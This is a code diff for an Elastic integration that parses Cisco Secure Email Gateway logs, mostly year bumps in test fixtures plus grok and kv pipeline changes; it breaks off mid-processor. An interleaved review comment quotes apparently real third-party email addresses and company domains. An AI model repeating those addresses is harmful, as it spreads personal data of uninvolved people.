41c66472d21..7f3578d03bd 100644 --- a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-error.log-expected.json +++ b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-error.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "alert_category": "Quarantine", @@ -34,7 +34,7 @@ ] }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -76,7 +76,7 @@ ] }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { 
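Review bot: The first new expected event in this hunk cannot be produced from its own input: it asserts `"cs4": "AS8PR07MB7750BD7C13A560C44183D3158A5F2@AS8PR07MB7750.eurprd07.prod.outlook.com"`, yet both `message` and `event.original` in the same entry carry `cs4Label=ExternalMsgID cs4=''`, so the fixture looks hand-edited after generation rather than regenerated from the sample log, and a pipeline test run against it should fail. The same two entries also keep what look like real third-party identifiers — personal names in `friendly_from`, `Petra.Zander@druseidt.de` in `reply_to`, `teresa.faria@goeyeweargroup.com` in `email.to.address`, and `druseidt.de` / `exacttarget.com` / `outlook.com` hosts in `helo.domain`, `source.domain` and `url_details` — while the IPs and `client.test` were anonymized; for a public test fixture the sample log should be re-anonymized with placeholder names and `.test` / `example.com` domains throughout and the expected file regenerated from it, which would also resolve the `cs4` mismatch. Separately, the `@timestamp` values such as `2024-07-04T06:21:54.000Z` appear to take their year from the generation date, since the raw syslog header `Jul 04 06:21:54` has none; if so, these entries and the `2023`→`2024` `@timestamp` bumps in the following test-common-* sections will need the same bump again at the next year rollover.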
@@ -116,7 +116,7 @@ ] }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { diff --git a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-gui-log.log-expected.json b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-gui-log.log-expected.json index eecf25365d9..8bee5dea4d2 100644 --- a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-gui-log.log-expected.json +++ b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-gui-log.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -75,7 +75,7 @@ } }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -130,7 +130,7 @@ } }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "action": "logged out", @@ -174,7 +174,7 @@ } }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -218,7 +218,7 @@ } }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -256,7 +256,7 @@ ] }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "action": "The HTTPS session has been established successfully.", @@ -302,7 +302,7 @@ } }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { 
@@ -332,7 +332,7 @@ ] }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -362,7 +362,7 @@ ] }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -401,7 +401,7 @@ ] }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -440,7 +440,7 @@ ] }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "action": "changed", diff --git a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-status.log-expected.json b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-status.log-expected.json index c6ba96b5803..1540d0ff379 100644 --- a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-status.log-expected.json +++ b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-status.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-03-30T15:12:26.000Z", + "@timestamp": "2024-03-30T15:12:26.000Z", "cisco_secure_email_gateway": { "log": { "5xx_hard_bounces": 0, diff --git a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-system.log-expected.json b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-system.log-expected.json index 25755775ac9..d9249dfc6f6 100644 --- a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-system.log-expected.json +++ b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-system.log-expected.json 
@@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -41,7 +41,7 @@ } }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -75,7 +75,7 @@ ] }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -105,7 +105,7 @@ ] }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -135,7 +135,7 @@ ] }, { - "@timestamp": "2023-03-17T18:31:14.000Z", + "@timestamp": "2024-03-17T18:31:14.000Z", "cisco_secure_email_gateway": { "log": { "category": { diff --git a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-text-mail.log-expected.json b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-text-mail.log-expected.json index 07538291a4f..a333226c03d 100644 --- a/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-text-mail.log-expected.json +++ b/packages/cisco_secure_email_gateway/data_stream/log/_dev/test/pipeline/test-common-text-mail.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -36,7 +36,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -66,7 +66,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { 
@@ -99,7 +99,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -135,7 +135,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "address": "1.128.3.4", @@ -181,7 +181,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -214,7 +214,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -251,7 +251,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -289,7 +289,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -326,7 +326,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -356,7 +356,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "address": "1.128.3.4", @@ -396,7 +396,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -430,7 +430,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { 
@@ -464,17 +464,17 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { "name": "mail_logs" }, "delivery_connection_id": "8", + "email_participants": "('from', 'service-account@example.com'), ('reply-to', 'service-account@example.com'), ('to', 'userA@example.com, userB@example.com')", "message": "Message done DCID 8 MID 6 to RID [0] [('from', 'service-account@example.com'), ('reply-to', 'service-account@example.com'), ('to', 'userA@example.com, userB@example.com')]", "message_status": "Message done", - "recipient_id": "0", - "email_participants": "('from', 'service-account@example.com'), ('reply-to', 'service-account@example.com'), ('to', 'userA@example.com, userB@example.com')" + "recipient_id": "0" } }, "ecs": { @@ -499,7 +499,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -529,7 +529,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -559,7 +559,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -596,7 +596,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -626,7 +626,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -665,7 +665,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { 
@@ -704,7 +704,7 @@ ] }, { - "@timestamp": "2023-03-17T18:24:37.000Z", + "@timestamp": "2024-03-17T18:24:37.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -753,7 +753,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -786,7 +786,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -818,7 +818,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -850,7 +850,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -882,7 +882,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -914,7 +914,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -946,7 +946,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -978,7 +978,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -1011,7 +1011,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -1043,7 +1043,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { 
@@ -1075,7 +1075,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -1110,7 +1110,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -1150,7 +1150,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -1183,7 +1183,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -1215,7 +1215,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -1263,7 +1263,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -1299,7 +1299,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -1341,7 +1341,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { @@ -1377,7 +1377,7 @@ ] }, { - "@timestamp": "2023-09-12T11:00:00.000Z", + "@timestamp": "2024-09-12T11:00:00.000Z", "cisco_secure_email_gateway": { "log": { "category": { diff --git a/packages/cisco_secure_email_gateway/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_secure_email_gateway/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 52010b787e9..3978e0ccf2a 100644 --- a/packages/cisco_secure_email_gateway/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_secure_email_gateway/data_stream/log/elasticsearch/ingest_pipeline/default.yml 
@@ -21,8 +21,8 @@ processors:
 - grok:
 field: event.original
 patterns:
- - '^(?:<%{NUMBER:log.syslog.priority:long}>)?%{SYSLOGTIMESTAMP:_tmp.timestamp} %{DATA:cisco_secure_email_gateway.log.category.name}: %{WORD:log.level}: %{GREEDYDATA:cisco_secure_email_gateway.log.message}$'
- - '^(?:<%{NUMBER:log.syslog.priority:long}>)?%{SYSLOGTIMESTAMP:_tmp.timestamp} %{DATA:cisco_secure_email_gateway.log.category.name}: %{GREEDYDATA:cisco_secure_email_gateway.log.message}$'
+ - '^(?:<%{NUMBER:log.syslog.priority:long}>)?%{SYSLOGTIMESTAMP:_tmp.timestamp} (?:%{HOSTNAME:cisco_secure_email_gateway.log.host} )?%{DATA:cisco_secure_email_gateway.log.category.name}: %{WORD:log.level}: %{GREEDYDATA:cisco_secure_email_gateway.log.message}$'
+ - '^(?:<%{NUMBER:log.syslog.priority:long}>)?%{SYSLOGTIMESTAMP:_tmp.timestamp} (?:%{HOSTNAME:cisco_secure_email_gateway.log.host} )?%{DATA:cisco_secure_email_gateway.log.category.name}: %{GREEDYDATA:cisco_secure_email_gateway.log.message}$'
 - '^%{DATA:_tmp.timestamp} %{WORD:log.level}: %{GREEDYDATA:cisco_secure_email_gateway.log.message}$'
 - '^%{GREEDYDATA:cisco_secure_email_gateway.log.message}$'
 - trim:
diff --git a/packages/cisco_secure_email_gateway/data_stream/log/elasticsearch/ingest_pipeline/pipeline_amp.yml b/packages/cisco_secure_email_gateway/data_stream/log/elasticsearch/ingest_pipeline/pipeline_amp.yml
index 4ade6d3a389..ccbdadac4f5 100644
--- a/packages/cisco_secure_email_gateway/data_stream/log/elasticsearch/ingest_pipeline/pipeline_amp.yml
+++ b/packages/cisco_secure_email_gateway/data_stream/log/elasticsearch/ingest_pipeline/pipeline_amp.yml
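Review bot: The new optional `(?:%{HOSTNAME:cisco_secure_email_gateway.log.host} )?` group captures the appliance hostname from the syslog header into a package-specific field only; copying it to the ECS `observer.hostname` (or `host.name`) would make it usable by cross-integration detections, and the new field also needs an entry in the data stream's fields definition, which is not part of this diff. HOSTNAME accepts any dotted alphanumeric token, so on a line without a host a category name that contains a space could have its first word captured as the host instead; a pipeline test fixture with a host-less line next to the new host-bearing samples would pin that. A short comment above the patterns, such as `# host is optional: the syslog header carries it only when the appliance is configured to send it`, would record why the group is optional.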
@@ -10,7 +10,7 @@ processors:
 - '^Response received for file reputation query from (Cloud|Cache). %{GREEDYDATA:_tmp.new_message}$'
 - '^File Analysis complete. SHA256: %{GREEDYDATA:email.attachments.file.hash.sha256}, Submit Timestamp: %{GREEDYDATA:_tmp.submit.timestamp}, Update Timestamp: %{GREEDYDATA:_tmp.update.timestamp}, Disposition: %{DATA:cisco_secure_email_gateway.log.disposition} Score: %{NUMBER:cisco_secure_email_gateway.log.score:long}, run_id: %{NUMBER:cisco_secure_email_gateway.log.run_id} Details: %{DATA:cisco_secure_email_gateway.log.details} Spyname:\[%{GREEDYDATA:cisco_secure_email_gateway.log.spy_name}\]$'
 - '^(?i)File not uploaded for analysis.\s+MID = %{NUMBER:email.message_id},? File SHA256\[%{GREEDYDATA:email.attachments.file.hash.sha256}\],? File mime\[%{GREEDYDATA:email.attachments.file.mime_type}\],? Reason: %{GREEDYDATA:event.reason}$'
- - '^File analysis upload skipped. SHA256: %{GREEDYDATA:email.attachments.file.hash.sha256},Timestamp\[%{GREEDYDATA:_tmp.submit.timestamp}\] details\[%{GREEDYDATA:_tmp.cisco_secure_email_gateway.log.remaining_details}]$'
+ - '^File analysis upload skipped. SHA256: %{GREEDYDATA:email.attachments.file.hash.sha256},Timestamp\[%{GREEDYDATA:_tmp.submit.timestamp}\] details\[%{GREEDYDATA:_tmp.cisco_secure_email_gateway.log.remaining_details}\]$'
 - '^SHA256: %{GREEDYDATA:email.attachments.file.hash.sha256},Timestamp\[%{GREEDYDATA:_tmp.submit.timestamp}\] details\[%{GREEDYDATA:cisco_secure_email_gateway.log.server_error_details}\]$'
 - '^Retrospective verdict received. %{GREEDYDATA:_tmp.new_message}$'
 - '^%{GREEDYDATA:cisco_secure_email_gateway.log.message}$'
diff --git a/packages/cisco_secure_email_gateway/data_stream/log/elasticsearch/ingest_pipeline/pipeline_consolidated_event.yml b/packages/cisco_secure_email_gateway/data_stream/log/elasticsearch/ingest_pipeline/pipeline_consolidated_event.yml
index 39ebafd09ac..07a6491d63a 100644
--- a/packages/cisco_secure_email_gateway/data_stream/log/elasticsearch/ingest_pipeline/pipeline_consolidated_event.yml
+++ b/packages/cisco_secure_email_gateway/data_stream/log/elasticsearch/ingest_pipeline/pipeline_consolidated_event.yml
@@ -14,81 +14,339 @@ processors: \\|%{DATA:cisco_secure_email_gateway.log.event_class_id}\ \\|%{DATA:cisco_secure_email_gateway.log.event.name}\ \\|%{WORD:event.severity}\ - \\|%{DATA:_tmp.details}%{SPACE}\ - (?:%{ENDTIME}=%{DATA:event.end}%{SPACE})?\ - (?:ESADKIMVerdict=%{WORD:cisco_secure_email_gateway.log.esa.dkim_verdict} )?\ - (?:ESADLPVerdict=%{WORD:cisco_secure_email_gateway.log.esa.dlp_verdict} )?\ - (?:dvc=%{IP:cisco_secure_email_gateway.log.data.ip} )?\ - (?:ESAAttachmentDetails=%{DATA:cisco_secure_email_gateway.log.esa.attachment_details} )?\ - (?:ESAFriendlyFrom=%{DATA:cisco_secure_email_gateway.log.esa.friendly_from} )?\ - (?:ESAGMVerdict=%{WORD:cisco_secure_email_gateway.log.esa.graymail_verdict} )?\ - (?:%{STARTTIME}=%{DATA:event.start}%{SPACE})?\ - (?:(deviceInboundInterface||deviceOutboundInterface)=%{WORD:cisco_secure_email_gateway.log.listener.name} )?\ - (?:deviceDirection=%{DATA:cisco_secure_email_gateway.log.device_direction} )?\ - (?:ESAMailFlowPolicy=%{WORD:cisco_secure_email_gateway.log.esa.mail_flow_policy} )?\ - (?:suser=%{DATA:email.from.address} )?\ - (?:cs1Label=%{WORD:cisco_secure_email_gateway.log.cs1_label}%{SPACE}\ - cs1=%{DATA:cisco_secure_email_gateway.log.cs1} )?\ - (?:cs2Label=%{WORD:cisco_secure_email_gateway.log.cs2_label}%{SPACE}\ - cs2=%{DATA:cisco_secure_email_gateway.log.cs2} )?\ - (?:ESAMFVerdict=%{WORD:cisco_secure_email_gateway.log.esa.mf_verdict} )?\ - (?:act=%{WORD:cisco_secure_email_gateway.log.act} )?\ - (?:ESAFinalActionDetails=%{DATA:cisco_secure_email_gateway.log.esa.final_action_details} )?\ - (?:cs4Label=%{DATA:cisco_secure_email_gateway.log.cs4_label} )?\ - (?:cs4='<%{DATA:cisco_secure_email_gateway.log.cs4}>' )?\ - (?:ESAMsgSize=%{NUMBER:cisco_secure_email_gateway.log.esa.msg_size:long} )?\ - (?:ESAOFVerdict=%{WORD:cisco_secure_email_gateway.log.esa.outbreak_filter_verdict} )?\ - (?:duser=%{DATA:email.to.address} )?\ - (?:ESAHeloDomain=%{DATA:cisco_secure_email_gateway.log.esa.helo.domain} )?\ - 
(?:ESAHeloIP=%{IP:cisco_secure_email_gateway.log.esa.helo.ip} )?\ - (?:ESAReplyTo=%{DATA:cisco_secure_email_gateway.log.esa.reply_to} )?\ - (?:cfp1Label=%{WORD:cisco_secure_email_gateway.log.cfp1_label}%{SPACE}\ - cfp1=%{DATA:_tmp.cfp1} )?\ - (?:ESASDRDomainAge=%{DATA:cisco_secure_email_gateway.log.esa.sdr_consolidated_domain_age} )?\ - (?:cs3Label=%{WORD:cisco_secure_email_gateway.log.cs3_label} )?\ - (?:cs3=%{DATA:cisco_secure_email_gateway.log.cs3} )?\ - (?:cs6Label=%{DATA:cisco_secure_email_gateway.log.cs6_label} )?\ - (?:cs6=%{DATA:cisco_secure_email_gateway.log.cs6} )?\ - (?:ESASPFVerdict=%{DATA:cisco_secure_email_gateway.log.esa.spf_verdict} )?\ - (?:%{SOURCEHOSTNAME}=%{DATA:source.domain} )?\ - (?:ESASenderGroup=%{DATA:cisco_secure_email_gateway.log.esa.sender_group} )?\ - (?:%{SOURCEADDRESS}=%{IP:source.ip} )?\ - msg=%{GREEDYDATA:_tmp.msg}$" - - ^%{GREEDYDATA:cisco_secure_email_gateway.log.message}$ - pattern_definitions: - STARTTIME: '(startTime|start)' - ENDTIME: '(endTime|end)' - SOURCEADDRESS: '(sourceAddress|src)' - SOURCEHOSTNAME: '(sourceHostName|shost)' - - grok: - field: _tmp.msg - if: ctx._tmp?.msg != null - patterns: - - "^['\"]%{DATA:email.subject}['\"](?:$|\\s)\ - (?:ESAURLDetails=%{DATA:cisco_secure_email_gateway.log.esa.url_details}(?:$|\\s))?\ - (?:ESATLSInCipher=%{DATA:cisco_secure_email_gateway.log.esa.tls.in.cipher} )?\ - (?:ESATLSInConnStatus=%{WORD:cisco_secure_email_gateway.log.esa.tls.in.connection_status} )?\ - (?:ESATLSInProtocol=%{DATA:cisco_secure_email_gateway.log.esa.tls.in.protocol} )?\ - (?:ESATLSOutCipher=%{DATA:cisco_secure_email_gateway.log.esa.tls.out.cipher} )?\ - (?:ESATLSOutConnStatus=%{WORD:cisco_secure_email_gateway.log.esa.tls.out.connection_status} )?\ - (?:ESATLSOutProtocol=%{DATA:cisco_secure_email_gateway.log.esa.tls.out.protocol}(?:$|\\s))?\ - (?:ESADaneHost=%{DATA:cisco_secure_email_gateway.log.esa.dane.host} )?\ - (?:ESADaneStatus=%{WORD:cisco_secure_email_gateway.log.esa.dane.status}(?:$|\\s))?\ - 
(?:ESADHASource=%{IP:cisco_secure_email_gateway.log.esa.dha_source}(?:$|\\s))?\ - (?:ESADMARCVerdict=%{WORD:cisco_secure_email_gateway.log.esa.dmarc_verdict}(?:$|\\s))?\ - (?:cs5Label=%{DATA:cisco_secure_email_gateway.log.cs5_label}(?:$|\\s))?\ - (?:cs5=%{DATA:cisco_secure_email_gateway.log.cs5}(?:$|\\s))?\ - (?:ESAMARAction=%{DATA:cisco_secure_email_gateway.log.esa.mail_auto_remediation_action}(?:$|\\s))?\ - (?:ESAMsgTooBigFromSender=%{WORD:cisco_secure_email_gateway.log.esa.msg_too_big_from_sender}(?:$|\\s))?\ - (?:ESARateLimitedIP=%{GREEDYDATA:cisco_secure_email_gateway.log.esa.rate_limited_ip}(?:$|\\s))?$" - - ^%{GREEDYDATA:cisco_secure_email_gateway.log.message}$ + \\|%{GREEDYDATA:_tmp.details}$" - kv: field: _tmp.details + target_field: _tmp.fields if: ctx._tmp?.details != null - field_split: ' | ' + field_split: '(?:((\s+)?$|\s+(?=\w+=)))' value_split: '=' ignore_failure: true ignore_missing: true + - rename: + field: _tmp.fields.ESAAttachmentDetails + target_field: cisco_secure_email_gateway.log.esa.attachment_details + ignore_missing: true + ignore_failure: true + - convert: + field: _tmp.fields.ESADHASource + target_field: cisco_secure_email_gateway.log.esa.dha_source + if: ctx._tmp?.fields?.ESADHASource != null + type: ip + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESADKIMVerdict + target_field: cisco_secure_email_gateway.log.esa.dkim_verdict + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESADLPVerdict + target_field: cisco_secure_email_gateway.log.esa.dlp_verdict + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESADMARCVerdict + target_field: cisco_secure_email_gateway.log.esa.dmarc_verdict + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESADaneHost + target_field: cisco_secure_email_gateway.log.esa.dane.host + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESADaneStatus + target_field: 
cisco_secure_email_gateway.log.esa.dane.status + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESAFinalActionDetails + target_field: cisco_secure_email_gateway.log.esa.final_action_details + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESAFriendlyFrom + target_field: cisco_secure_email_gateway.log.esa.friendly_from + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESAGMVerdict + target_field: cisco_secure_email_gateway.log.esa.graymail_verdict + ignore_missing: true + ignore_failure: true + - urldecode: + field: _tmp.fields.ESAHeloDomain + target_field: cisco_secure_email_gateway.log.esa.helo.domain + ignore_missing: true + ignore_failure: true + - convert: + field: _tmp.fields.ESAHeloIP + target_field: cisco_secure_email_gateway.log.esa.helo.ip + if: ctx._tmp?.fields?.ESAHeloIP != null + type: ip + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESAMARAction + target_field: cisco_secure_email_gateway.log.esa.mail_auto_remediation_action + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESAMFVerdict + target_field: cisco_secure_email_gateway.log.esa.mf_verdict + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESAMailFlowPolicy + target_field: cisco_secure_email_gateway.log.esa.mail_flow_policy + ignore_missing: true + ignore_failure: true + - convert: + field: _tmp.fields.ESAMsgSize + target_field: cisco_secure_email_gateway.log.esa.msg_size + type: long + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESAMsgTooBigFromSender + target_field: cisco_secure_email_gateway.log.esa.msg_too_big_from_sender + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESAOFVerdict + target_field: cisco_secure_email_gateway.log.esa.outbreak_filter_verdict + ignore_missing: true + ignore_failure: true + - rename: + field: _tmp.fields.ESARateLimitedIP + 
